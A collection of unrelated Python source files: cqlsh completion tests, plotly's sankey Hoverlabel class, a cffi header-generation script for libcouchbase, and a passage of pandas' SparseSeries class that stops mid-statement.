self.trycompletions('DESC FUNCTION ' + '"' + self.cqlsh.keyspace + '".f',
choices=['fbestband',
'fbestsong',
'fmax',
'fmin'],
other_choices_ok=True)
# See comment above for DESC TABLE
# self.trycompletions('DESC AGGREGATE ' + '"' + self.cqlsh.keyspace + '"', immediate='.aggm')
self.trycompletions('DESC AGGREGATE ' + '"' + self.cqlsh.keyspace + '".', immediate='aggm')
self.trycompletions('DESC AGGREGATE ' + '"' + self.cqlsh.keyspace + '".aggm',
choices=['aggmin',
'aggmax'],
other_choices_ok=True)
def test_complete_in_drop_columnfamily(self):
pass
def test_complete_in_truncate(self):
pass
def test_complete_in_alter_columnfamily(self):
pass
def test_complete_in_use(self):
pass
def test_complete_in_create_index(self):
pass
def test_complete_in_drop_index(self):
pass
|
|
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Hoverlabel(_BaseTraceHierarchyType):
# class properties
# --------------------
_parent_path_str = "sankey"
_path_str = "sankey.hoverlabel"
_valid_props = {
"align",
"alignsrc",
"bgcolor",
"bgcolorsrc",
"bordercolor",
"bordercolorsrc",
"font",
"namelength",
"namelengthsrc",
}
# align
# -----
@property
def align(self):
"""
Sets the horizontal alignment of the text content within hover
label box. Has an effect only if the hover label text spans
more two or more lines
The 'align' property is an enumeration that may be specified as:
- One of the following enumeration values:
['left', 'right', 'auto']
- A tuple, list, or one-dimensional numpy array of the above
Returns
-------
Any|numpy.ndarray
"""
return self["align"]
@align.setter
def align(self, val):
self["align"] = val
# alignsrc
# --------
@property
def alignsrc(self):
"""
Sets the source reference on Chart Studio Cloud for `align`.
The 'alignsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["alignsrc"]
@alignsrc.setter
def alignsrc(self, val):
self["alignsrc"] = val
# bgcolor
# -------
@property
def bgcolor(self):
"""
Sets the background color of the hover labels for this trace
The 'bgcolor' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
- A list or array of any of the above
Returns
-------
str|numpy.ndarray
"""
return self["bgcolor"]
@bgcolor.setter
def bgcolor(self, val):
self["bgcolor"] = val
# bgcolorsrc
# ----------
@property
def bgcolorsrc(self):
"""
Sets the source reference on Chart Studio Cloud for `bgcolor`.
The 'bgcolorsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["bgcolorsrc"]
@bgcolorsrc.setter
def bgcolorsrc(self, val):
self["bgcolorsrc"] = val
# bordercolor
# -----------
@property
def bordercolor(self):
"""
Sets the border color of the hover labels for this trace.
The 'bordercolor' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
- A list or array of any of the above
Returns
-------
str|numpy.ndarray
"""
return self["bordercolor"]
@bordercolor.setter
def bordercolor(self, val):
self["bordercolor"] = val
# bordercolorsrc
# --------------
@property
def bordercolorsrc(self):
"""
Sets the source reference on Chart Studio Cloud for
`bordercolor`.
The 'bordercolorsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["bordercolorsrc"]
@bordercolorsrc.setter
def bordercolorsrc(self, val):
self["bordercolorsrc"] = val
# font
# ----
@property
def font(self):
"""
Sets the font used in hover labels.
The 'font' property is an instance of Font
that may be specified as:
- An instance of :class:`plotly.graph_objs.sankey.hoverlabel.Font`
- A dict of string/value properties that will be passed
to the Font constructor
Supported dict properties:
color
colorsrc
Sets the source reference on Chart Studio Cloud
for `color`.
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The Chart Studio Cloud (at
https://chart-studio.plotly.com or on-premise)
generates images on a server, where only a
select number of fonts are installed and
supported. These include "Arial", "Balto",
"Courier New", "Droid Sans",, "Droid Serif",
"Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
familysrc
Sets the source reference on Chart Studio Cloud
for `family`.
size
sizesrc
Sets the source reference on Chart Studio Cloud
for `size`.
Returns
-------
plotly.graph_objs.sankey.hoverlabel.Font
"""
return self["font"]
@font.setter
def font(self, val):
self["font"] = val
# namelength
# ----------
@property
def namelength(self):
"""
Sets the default length (in number of characters) of the trace
name in the hover labels for all traces. -1 shows the whole
name regardless of length. 0-3 shows the first 0-3 characters,
and an integer >3 will show the whole name if it is less than
that many characters, but if it is longer, will truncate to
`namelength - 3` characters and add an ellipsis.
The 'namelength' property is a integer and may be specified as:
- An int (or float that will be cast to an int)
in the interval [-1, 9223372036854775807]
- A tuple, list, or one-dimensional numpy array of the above
Returns
-------
int|numpy.ndarray
"""
return self["namelength"]
@namelength.setter
def namelength(self, val):
self["namelength"] = val
# namelengthsrc
# -------------
@property
def namelengthsrc(self):
"""
Sets the source reference on Chart Studio Cloud for
`namelength`.
The 'namelengthsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["namelengthsrc"]
@namelengthsrc.setter
def namelengthsrc(self, val):
self["namelengthsrc"] = val
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
align
Sets the horizontal alignment of the text content
within hover label box. Has an effect only if the hover
label text spans more two or more lines
alignsrc
Sets the source reference on Chart Studio Cloud for
`align`.
bgcolor
Sets the background color of the hover labels for this
trace
bgcolorsrc
Sets the source reference on Chart Studio Cloud for
`bgcolor`.
bordercolor
Sets the border color of the hover labels for this
trace.
bordercolorsrc
Sets the source reference on Chart Studio Cloud for
`bordercolor`.
font
Sets the font used in hover labels.
namelength
Sets the default length (in number of characters) of
the trace name in the hover labels for all traces. -1
shows the whole name regardless of length. 0-3 shows
the first 0-3 characters, and an integer >3 will show
the whole name if it is less than that many characters,
but if it is longer, will truncate to `namelength - 3`
characters and add an ellipsis.
namelengthsrc
Sets the source reference on Chart Studio Cloud for
`namelength`.
"""
def __init__(
self,
arg=None,
align=None,
alignsrc=None,
bgcolor=None,
bgcolorsrc=None,
bordercolor=None,
bordercolorsrc=None,
font=None,
namelength=None,
namelengthsrc=None,
**kwargs
):
"""
Construct a new Hoverlabel object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of
:class:`plotly.graph_objs.sankey.Hoverlabel`
align
Sets the horizontal alignment of the text content
within hover label box. Has an effect only if the hover
label text spans more two or more lines
alignsrc
Sets the source reference on Chart Studio Cloud for
`align`.
bgcolor
Sets the background color of the hover labels for this
trace
bgcolorsrc
Sets the source reference on Chart Studio Cloud for
`bgcolor`.
bordercolor
Sets the border color of the hover labels for this
trace.
bordercolorsrc
Sets the source reference on Chart Studio Cloud for
`bordercolor`.
font
Sets the font used in hover labels.
namelength
Sets the default length (in number of characters) of
the trace name in the hover labels for all traces. -1
shows the whole name regardless of length. 0-3 shows
the first 0-3 characters, and an integer >3 will show
the whole name if it is less than that many characters,
but if it is longer, will truncate to `namelength - 3`
characters and add an ellipsis.
namelengthsrc
Sets the source reference on Chart Studio Cloud for
`namelength`.
Returns
-------
Hoverlabel
"""
super(Hoverlabel, self).__init__("hoverlabel")
if "_parent" in kwargs:
self._parent = kwargs["_parent"]
return
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.sankey.Hoverlabel
constructor must be a dict or
an instance of :class:`plotly.graph_objs.sankey.Hoverlabel`"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
self._validate = kwargs.pop("_validate", True)
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("align", None)
_v = align if align is not None else _v
if _v is not None:
self["align"] = _v
_v = arg.pop("alignsrc", None)
_v = alignsrc if alignsrc is not None else _v
if _v is not None:
self["alignsrc"] = _v
_v = arg.pop("bgcolor", None)
_v = bgcolor if bgcolor is not None else _v
if _v is not None:
self["bgcolor"] = _v
_v = arg.pop("bgcolorsrc", None)
_v = bgcolorsrc if bgcolorsrc is not None else _v
if _v is not None:
self["bgcolorsrc"] = _v
_v = arg.pop("bordercolor", None)
_v = bordercolor if bordercolor is not None else _v
if _v is not None:
self["bordercolor"] = _v
_v = arg.pop("bordercolorsrc", None)
_v = bordercolorsrc if bordercolorsrc is not None else _v
if _v is not None:
self["bordercolorsrc"] = _v
_v = arg.pop("font", None)
_v = font if font is not None else _v
if _v is not None:
self["font"] = _v
_v = arg.pop("namelength", None)
_v = namelength if namelength is not None else _v
if _v is not None:
self["namelength"] = _v
_v = arg.pop("namelengthsrc", None)
_v = namelengthsrc if namelengthsrc is not None else _v
if _v is not None:
self["namelengthsrc"] = _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
|
|
from __future__ import print_function
import os
import subprocess
import re
from cffi import FFI
# Globals
CPP_OUTPUT = os.path.join(os.path.dirname(__file__), "_lcb.h")
FAKE_INKPATH = os.path.join(os.path.dirname(__file__), 'fakeinc')
LCB_ROOT = os.environ.get('PYCBC_CFFI_PREFIX', '')
ffi = FFI()
C = None
CPP_INPUT = """
#define __attribute__(x)
#include <libcouchbase/couchbase.h>
#include <libcouchbase/api3.h>
#include <libcouchbase/views.h>
#include <libcouchbase/n1ql.h>
void _Cb_set_key(void*,const void*, size_t);
void _Cb_set_val(void*,const void*, size_t);
void _Cb_do_callback(lcb_socket_t s, short events, lcb_ioE_callback cb, void *arg);
void memset(void*,int,int);
"""
VERIFY_INPUT = """
#include <assert.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/time.h>
#include <libcouchbase/couchbase.h>
#include <libcouchbase/api3.h>
#include <libcouchbase/views.h>
#include <libcouchbase/n1ql.h>
void _Cb_set_key(void *cmd, const void *key, size_t nkey) {
LCB_CMD_SET_KEY((lcb_CMDBASE*)cmd, key, nkey);
}
void _Cb_set_val(void *cmd, const void *val, size_t nval) {
LCB_CMD_SET_VALUE((lcb_CMDSTORE*)cmd, val, nval);
}
void _Cb_do_callback(lcb_socket_t s, short events, lcb_ioE_callback cb, void *arg) {
cb(s, events, arg);
}
LIBCOUCHBASE_API
lcb_error_t
lcb_n1p_synctok_for(lcb_N1QLPARAMS *params, lcb_t instance,
const void *key, size_t nkey) { return LCB_SUCCESS; }
"""
RX_SHIFT = re.compile(r'(\(?\d+\)?)\s*((?:<<)|(?:>>)|(?:\|))\s*(\(?\d+\)?)')
def shift_replace(m):
ss = '{0} {1} {2}'.format(m.group(1), m.group(2), m.group(3))
return str(eval(ss))
def do_replace_vals(dh, decl):
keys = sorted(dh, cmp=lambda x, y: cmp(len(x), len(y)), reverse=True)
for k in keys:
decl = decl.replace(k, str(dh[k]))
return decl
def handle_enumvals(defhash, linedecl):
# First, inspect to see if there is any funky magic going on here,
# this can include things like shifts and the like
linedecl = linedecl.strip()
cur_decls = []
for decl in linedecl.split(','):
if not decl:
continue
if not '=' in decl:
cur_decls.append(decl)
continue
if '{' in decl:
preamble, decl = decl.split('{')
preamble += "{"
else:
preamble = ""
if '}' in decl:
decl, postamble = decl.split('}')
postamble = "}" + postamble
else:
postamble = ""
print(decl)
name, val = decl.split('=', 1)
name = name.strip()
val = val.strip()
val = val.replace(',', '')
val = do_replace_vals(defhash, val)
if not name.lower().startswith('lcb'):
continue
print("Handling", decl)
while RX_SHIFT.search(val):
val = RX_SHIFT.sub(shift_replace, val)
try:
ival = int(val)
except ValueError:
ival = int(val, 16)
decl = '{0}={1}'.format(name, str(ival))
defhash[name] = ival
cur_decls.append(preamble + decl + postamble)
ret = ','.join(cur_decls)
if '}' not in ret:
ret += ','
return ret
CPP_COMMON = ['gcc', '-E', '-Wall', '-Wextra',
'-I{0}'.format(FAKE_INKPATH), '-I{0}/include'.format(LCB_ROOT),
'-std=c89', '-xc']
def get_preprocessed(csrc, extra_options=None):
options = CPP_COMMON[::]
if extra_options:
options += extra_options
options += ['-']
po = subprocess.Popen(options, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
stdout, _ = po.communicate(csrc)
if po.returncode != 0:
raise ValueError("Bad CPP Input!")
try:
return str(stdout, 'utf8').split("\n")
except TypeError:
return stdout.split("\n")
def _exec_cpp():
lines = get_preprocessed(CPP_INPUT)
outlines = []
defhash = {}
for l in lines:
if l.startswith('#'):
continue
if not l:
continue
# Find definitions
if '=' in l and '==' not in l:
# Handle enums
l = handle_enumvals(defhash, l)
l = l.replace("\r", "")
outlines.append(l)
with open(CPP_OUTPUT, "w") as fp:
fp.write("\n".join(outlines))
fp.flush()
def ensure_header():
if os.environ.get('PYCBC_CFFI_REGENERATE'):
do_generate = True
elif not os.path.exists(CPP_OUTPUT):
do_generate = True
else:
do_generate = False
if do_generate:
_exec_cpp()
def get_handle():
global C
if C:
return ffi, C
ensure_header()
ffi.cdef(open(CPP_OUTPUT, "r").read())
ffi.cdef(r'''
#define LCB_CMDOBSERVE_F_MASTER_ONLY ...
#define LCB_RESP_F_FINAL ...
#define LCB_CNTL_SET ...
#define LCB_CNTL_GET ...
#define LCB_CNTL_BUCKETNAME ...
#define LCB_CNTL_VBMAP ...
#define LCB_CMDVIEWQUERY_F_INCLUDE_DOCS ...
#define LCB_N1P_QUERY_STATEMENT ...
''')
C = ffi.verify(VERIFY_INPUT,
libraries=['couchbase'],
library_dirs=[os.path.join(LCB_ROOT, 'lib')],
include_dirs=[os.path.join(LCB_ROOT, 'include')],
runtime_library_dirs=[os.path.join(LCB_ROOT, 'lib')])
return ffi, C
|
|
"""
Data structures for sparse float data. Life is made simpler by dealing only
with float64 data
"""
# pylint: disable=E1101,E1103,W0231
import numpy as np
import warnings
from pandas.core.dtypes.missing import isna, notna
from pandas.compat.numpy import function as nv
from pandas.core.index import Index, ensure_index, InvalidIndexError
from pandas.core.series import Series
from pandas.core.internals import SingleBlockManager
from pandas.core import generic
import pandas.core.common as com
import pandas.core.indexes.base as ibase
import pandas.core.ops as ops
import pandas._libs.index as libindex
from pandas.util._decorators import Appender
from pandas.core.sparse.array import (
make_sparse, SparseArray,
_make_index)
from pandas._libs.sparse import BlockIndex, IntIndex
import pandas._libs.sparse as splib
from pandas.core.sparse.scipy_sparse import (
_sparse_series_to_coo,
_coo_to_sparse_series)
_shared_doc_kwargs = dict(axes='index', klass='SparseSeries',
axes_single_arg="{0, 'index'}",
optional_labels='', optional_axis='')
class SparseSeries(Series):
"""Data structure for labeled, sparse floating point data
Parameters
----------
data : {array-like, Series, SparseSeries, dict}
.. versionchanged :: 0.23.0
If data is a dict, argument order is maintained for Python 3.6
and later.
kind : {'block', 'integer'}
fill_value : float
Code for missing value. Defaults depends on dtype.
0 for int dtype, False for bool dtype, and NaN for other dtypes
sparse_index : {BlockIndex, IntIndex}, optional
Only if you have one. Mainly used internally
Notes
-----
SparseSeries objects are immutable via the typical Python means. If you
must change values, convert to dense, make your changes, then convert back
to sparse
"""
_subtyp = 'sparse_series'
def __init__(self, data=None, index=None, sparse_index=None, kind='block',
fill_value=None, name=None, dtype=None, copy=False,
fastpath=False):
# we are called internally, so short-circuit
if fastpath:
# data is an ndarray, index is defined
if not isinstance(data, SingleBlockManager):
data = SingleBlockManager(data, index, fastpath=True)
if copy:
data = data.copy()
else:
if data is None:
data = []
if isinstance(data, Series) and name is None:
name = data.name
if isinstance(data, SparseArray):
if index is not None:
assert (len(index) == len(data))
sparse_index = data.sp_index
if fill_value is None:
fill_value = data.fill_value
data = np.asarray(data)
elif isinstance(data, SparseSeries):
if index is None:
index = data.index.view()
if fill_value is None:
fill_value = data.fill_value
# extract the SingleBlockManager
data = data._data
elif isinstance(data, (Series, dict)):
data = Series(data, index=index)
index = data.index.view()
res = make_sparse(data, kind=kind, fill_value=fill_value)
data, sparse_index, fill_value = res
elif isinstance(data, (tuple, list, np.ndarray)):
# array-like
if sparse_index is None:
res = make_sparse(data, kind=kind, fill_value=fill_value)
data, sparse_index, fill_value = res
else:
assert (len(data) == sparse_index.npoints)
elif isinstance(data, SingleBlockManager):
if dtype is not None:
data = data.astype(dtype)
if index is None:
index = data.index.view()
elif not data.index.equals(index) or copy: # pragma: no cover
# GH#19275 SingleBlockManager input should only be called
# internally
raise AssertionError('Cannot pass both SingleBlockManager '
'`data` argument and a different '
'`index` argument. `copy` must '
'be False.')
else:
length = len(index)
if data == fill_value or (isna(data) and isna(fill_value)):
if kind == 'block':
sparse_index = BlockIndex(length, [], [])
else:
sparse_index = IntIndex(length, [])
data = np.array([])
else:
if kind == 'block':
locs, lens = ([0], [length]) if length else ([], [])
sparse_index = BlockIndex(length, locs, lens)
else:
sparse_index = IntIndex(length, index)
v = data
data = np.empty(length)
data.fill(v)
if index is None:
index = ibase.default_index(sparse_index.length)
index = ensure_index(index)
# create/copy the manager
if isinstance(data, SingleBlockManager):
if copy:
data = data.copy()
else:
# create a sparse array
if not isinstance(data, SparseArray):
data = SparseArray(data, sparse_index=sparse_index,
fill_value=fill_value, dtype=dtype,
copy=copy)
data = SingleBlockManager(data, index)
generic.NDFrame.__init__(self, data)
self.index = index
self.name = name
@property
def values(self):
""" return the array """
return self.block.values
def __array__(self, result=None):
""" the array interface, return my values """
return self.block.values
def get_values(self):
""" same as values """
return self.block.to_dense().view()
@property
def block(self):
return self._data._block
@property
def fill_value(self):
return self.block.fill_value
@fill_value.setter
def fill_value(self, v):
self.block.fill_value = v
@property
def sp_index(self):
return self.block.sp_index
@property
def sp_values(self):
return self.values.sp_values
@property
def npoints(self):
return self.sp_index.npoints
@classmethod
def from_array(cls, arr, index=None, name=None, copy=False,
fill_value=None, fastpath=False):
"""Construct SparseSeries from array.
.. deprecated:: 0.23.0
Use the pd.SparseSeries(..) constructor instead.
"""
warnings.warn("'from_array' is deprecated and will be removed in a "
"future version. Please use the pd.SparseSeries(..) "
"constructor instead.", FutureWarning, stacklevel=2)
return cls(arr, index=index, name=name, copy=copy,
fill_value=fill_value, fastpath=fastpath)
@property
def _constructor(self):
return SparseSeries
@property
def _constructor_expanddim(self):
from pandas.core.sparse.api import SparseDataFrame
return SparseDataFrame
@property
def kind(self):
if isinstance(self.sp_index, BlockIndex):
return 'block'
elif isinstance(self.sp_index, IntIndex):
return 'integer'
def as_sparse_array(self, kind=None, fill_value=None, copy=False):
""" return my self as a sparse array, do not copy by default """
if fill_value is None:
fill_value = self.fill_value
if kind is None:
kind = self.kind
return SparseArray(self.values, sparse_index=self.sp_index,
fill_value=fill_value, kind=kind, copy=copy)
def __len__(self):
return len(self.block)
@property
def shape(self):
return self._data.shape
def __unicode__(self):
# currently, unicode is same as repr...fixes infinite loop
series_rep = Series.__unicode__(self)
rep = '{series}\n{index!r}'.format(series=series_rep,
index=self.sp_index)
return rep
def __array_wrap__(self, result, context=None):
"""
Gets called prior to a ufunc (and after)
See SparseArray.__array_wrap__ for detail.
"""
if isinstance(context, tuple) and len(context) == 3:
ufunc, args, domain = context
args = [getattr(a, 'fill_value', a) for a in args]
with np.errstate(all='ignore'):
fill_value = ufunc(self.fill_value, *args[1:])
else:
fill_value = self.fill_value
return self._constructor(result, index=self.index,
sparse_index=self.sp_index,
fill_value=fill_value,
copy=False).__finalize__(self)
def __array_finalize__(self, obj):
"""
Gets called after any ufunc or other array operations, necessary
to pass on the index.
"""
self.name = getattr(obj, 'name', None)
self.fill_value = getattr(obj, 'fill_value', None)
def _reduce(self, op, name, axis=0, skipna=True, numeric_only=None,
filter_type=None, **kwds):
""" perform a reduction operation """
return op(self.get_values(), skipna=skipna, **kwds)
def __getstate__(self):
# pickling
return dict(_typ=self._typ, _subtyp=self._subtyp, _data=self._data,
fill_value=self.fill_value, name=self.name)
def _unpickle_series_compat(self, state):
nd_state, own_state = state
# recreate the ndarray
data = np.empty(nd_state[1], dtype=nd_state[2])
np.ndarray.__setstate__(data, nd_state)
index, fill_value, sp_index = own_state[:3]
name = None
if len(own_state) > 3:
name = own_state[3]
# create a sparse array
if not isinstance(data, SparseArray):
data = SparseArray(data, sparse_index=sp_index,
fill_value=fill_value, copy=False)
# recreate
data = SingleBlockManager(data, index, fastpath=True)
generic.NDFrame.__init__(self, data)
self._set_axis(0, index)
self.name = name
def __iter__(self):
""" forward to the array """
return iter(self.values)
def _set_subtyp(self, is_all_dates):
if is_all_dates:
object.__setattr__(self, '_subtyp', 'sparse_time_series')
else:
object.__setattr__(self, '_subtyp', 'sparse_series')
def _ixs(self, i, axis=0):
"""
Return the i-th value or values in the SparseSeries by location
Parameters
----------
i : int, slice, or sequence of integers
Returns
-------
value : scalar (int) or Series (slice, sequence)
"""
label = self.index[i]
if isinstance(label, Index):
return self.take(i, axis=axis)
else:
return self._get_val_at(i)
def _get_val_at(self, loc):
""" forward to the array """
return self.block.values._get_val_at(loc)
def __getitem__(self, key):
try:
return self.index.get_value(self, key)
except InvalidIndexError:
pass
except KeyError:
if isinstance(key, (int, np.integer)):
return self._get_val_at(key)
elif key is Ellipsis:
return self
raise Exception('Requested index not in this series!')
except TypeError:
# Could not hash item, must be array-like?
pass
key = com._values_from_object(key)
if self.index.nlevels > 1 and isinstance(key, tuple):
# to handle MultiIndex labels
key = self.index.get_loc(key)
return self._constructor(self.values[key],
index=self.index[key]).__finalize__(self)
def _get_values(self, indexer):
try:
return self._constructor(self._data.get_slice(indexer),
fastpath=True).__finalize__(self)
except Exception:
return self[indexer]
def _set_with_engine(self, key, value):
return self._set_value(key, value)
def abs(self):
"""
Return an object with absolute value taken. Only applicable to objects
that are all numeric
Returns
-------
abs: same type as caller
"""
return self._constructor(np.abs(self.values),
index=self.index).__finalize__(self)
def get(self, label, default=None):
"""
Returns value occupying requested label, default to specified
missing value if not present. Analogous to dict.get
Parameters
----------
label : object
Label value looking for
default : object, optional
Value to return if label not in index
Returns
-------
y : scalar
"""
if label in self.index:
loc = self.index.get_loc(label)
return self._get_val_at(loc)
else:
return default
def get_value(self, label, takeable=False):
"""
Retrieve single value at passed index label
.. deprecated:: 0.21.0
Please use .at[] or .iat[] accessors.
Parameters
----------
index : label
takeable : interpret the index as indexers, default False
Returns
-------
value : scalar value
"""
warnings.warn("get_value is deprecated and will be removed "
"in a future release. Please use "
".at[] or .iat[] accessors instead", FutureWarning,
stacklevel=2)
return self._get_value(label, takeable=takeable)
def _get_value(self, label, takeable=False):
loc = label if takeable is True else self.index.get_loc(label)
return self._get_val_at(loc)
_get_value.__doc__ = get_value.__doc__
def set_value(self, label, value, takeable=False):
"""
Quickly set single value at passed label. If label is not contained, a
new object is created with the label placed at the end of the result
index
.. deprecated:: 0.21.0
Please use .at[] or .iat[] accessors.
Parameters
----------
label : object
Partial indexing with MultiIndex not allowed
value : object
Scalar value
takeable : interpret the index as indexers, default False
Notes
-----
This method *always* returns a new object. It is not particularly
efficient but is provided for API compatibility with Series
Returns
-------
series : SparseSeries
"""
warnings.warn("set_value is deprecated and will be removed "
"in a future release. Please use "
".at[] or .iat[] accessors instead", FutureWarning,
stacklevel=2)
return self._set_value(label, value, takeable=takeable)
def _set_value(self, label, value, takeable=False):
values = self.to_dense()
# if the label doesn't exist, we will create a new object here
# and possibly change the index
new_values = values._set_value(label, value, takeable=takeable)
if new_values is not None:
values = new_values
new_index = values.index
values = SparseArray(values, fill_value=self.fill_value,
kind=self.kind)
self._data = SingleBlockManager(values, new_index)
self._index = new_index
_set_value.__doc__ = set_value.__doc__
def _set_values(self, key, value):
# this might be inefficient as we have to recreate the sparse array
# rather than setting individual elements, but have to convert
# the passed slice/boolean that's in dense space into a sparse indexer
# not sure how to do that!
if isinstance(key, Series):
key = key.values
values = self.values.to_dense()
values[key] = libindex.convert_scalar(values, value)
values = SparseArray(values, fill_value=self.fill_value,
kind=self.kind)
self._data = SingleBlockManager(values, self.index)
def to_dense(self, sparse_only=False):
"""
Convert SparseSeries to a Series.
Parameters
----------
sparse_only : bool, default False
.. deprecated:: 0.20.0
This argument will be removed in a future version.
If True, return just the non-sparse values, or the dense version
of `self.values` if False.
Returns
-------
s : Series
"""
if sparse_only:
warnings.warn(("The 'sparse_only' parameter has been deprecated "
"and will be removed in a future version."),
FutureWarning, stacklevel=2)
int_index = self.sp_index.to_int_index()
index = self.index.take(int_index.indices)
return Series(self.sp_values, index=index, name=self.name)
else:
return Series(self.values.to_dense(), index=self.index,
name=self.name)
@property
def density(self):
r = float(self.sp_index.npoints) / float(self.sp_index.length)
return r
def copy(self, deep=True):
"""
Make a copy of the SparseSeries. Only the actual sparse values need to
be copied
"""
new_data = self._data
if deep:
new_data = self._data.copy()
return self._constructor(new_data, sparse_index=self.sp_index,
fill_value=self.fill_value).__finalize__(self)
@Appender(generic._shared_docs['reindex'] % _shared_doc_kwargs)
def reindex(self, index=None, method=None, copy=True, limit=None,
**kwargs):
return super(SparseSeries, self).reindex(index=index, method=method,
copy=copy, limit=limit,
**kwargs)
def sparse_reindex(self, new_index):
"""
Conform sparse values to new SparseIndex
Parameters
----------
new_index : {BlockIndex, IntIndex}
Returns
-------
reindexed : SparseSeries
"""
if not isinstance(new_index, splib.SparseIndex):
raise TypeError('new index must be a SparseIndex')
block = self.block.sparse_reindex(new_index)
new_data = SingleBlockManager(block, self.index)
return self._constructor(new_data, index=self.index,
sparse_index=new_index,
fill_value=self.fill_value).__finalize__(self)
@Appender(generic._shared_docs['take'])
def take(self, indices, axis=0, convert=None, *args, **kwargs):
if convert is not None:
msg = ("The 'convert' parameter is deprecated "
"and will be removed in a future version.")
warnings.warn(msg, FutureWarning, stacklevel=2)
else:
convert = True
nv.validate_take_with_convert(convert, args, kwargs)
new_values = SparseArray.take(self.values, indices)
new_index = self.index.take(indices)
return self._constructor(new_values,
index=new_index).__finalize__(self)
def cumsum(self, axis=0, *args, **kwargs):
"""
Cumulative sum of non-NA/null values.
When performing the cumulative summation, any non-NA/null values will
be skipped. The resulting SparseSeries will preserve the locations of
NaN values, but the fill value will be `np.nan` regardless.
Parameters
----------
axis : {0}
Returns
-------
cumsum : SparseSeries
"""
nv.validate_cumsum(args, kwargs)
if axis is not None:
axis = self._get_axis_number(axis)
new_array = self.values.cumsum()
return self._constructor(
